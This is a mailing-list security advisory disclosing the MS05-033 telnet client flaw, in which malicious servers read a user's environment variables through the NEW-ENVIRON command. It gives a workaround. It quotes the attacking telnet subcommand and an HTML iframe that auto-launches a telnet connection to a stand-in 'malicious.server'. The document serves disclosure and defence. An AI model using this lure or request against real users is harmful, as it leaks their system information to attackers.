The following security advisory is sent to the securiteam mailing list, and can
be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
Multiple Telnet Client Information Disclosure Vulnerabilities (MS05-033)
------------------------------------------------------------------------
SUMMARY
The TELNET protocol allows virtual network terminals to be connected to
over the Internet. The initial description of the telnet protocol was
given in RFC854 in May 1983. Since then there have been many extra
features added including encryption.
Flaws in handling of the NEW-ENVIRON TELNET command in multiple telnet
clients allows an attacker to gain sensitive information about the
victim's system.
DETAILS
Vulnerable Systems:
* Microsoft Telnet Client version 5.1.2600.2180 (
<http://go.microsoft.com/fwlink/?linkid=47016> MS05-033)
* Sun Solaris (
<http://sunsolve.sun.com/search/document.do?assetkey=1-26-57755-1> Sun
Alert 57755)
* Sun SEAM (
<http://sunsolve.sun.com/search/document.do?assetkey=1-26-57761-1> Sun
Alert 57761)
Remote exploitation of an input validation error in multiple telnet
clients could allow an attacker to gain sensitive information about the
victim's system.
The vulnerability specifically exists in the handling of the NEW-ENVIRON
command.
In order to exploit this vulnerability, a malicious server can send a
connected client the following telnet command:
SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE
Vulnerable telnet clients will send the contents of the reference
environment variable, which may contain information useful to an attacker.
The expected behavior would be only to send environment variables related
directly to the operation of the telnet client (for example, TERM), or
those specifically allowed by the user.
Successful exploitation of the vulnerability would allow an attacker to
read the values of arbitrary environment variables. By itself this
vulnerability is not a large threat, but exploiting this vulnerability may
give an attacker more information about a targeted system, which could
allow more effective attacks.
In order to exploit this vulnerability, an attacker would need to convince
the user to connect to their malicious server. It may be possible to
automatically launch the telnet command from a web page, for example:
< html>< body>
< iframe src='telnet://malicious.server/'>
</body>
On opening this page the telnet client may be launched and attempt to
connect to the host 'malicious.server'.
Workaround:
For Windows based platforms, disabling the Telnet handler or specifying a
different application to handle Telnet URL's can mitigate URL based
attacks. This can be accomplished by removing or modifying the following
registry key:
HKEY_CLASSES_ROOT\telnet\shell\open\command
This workaround should prevent automatic exploitation attempts. It does
not fix the underlying issue.
CVE Information:
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0488>
CAN-2005-0488
<http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1205>
CAN-2005-1205
ADDITIONAL INFORMATION
The original article can be found at:
<http://www.idefense.com/application/poi/display?id=260&type=vulnerabilities>
http://www.idefense.com/application/poi/display?id=260&type=vulnerabilities
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to:
list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to:
list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any
kind.
In no event shall we be liable for any damages whatsoever including direct,
indirect, incidental, consequential, loss of business profits or special
damages.
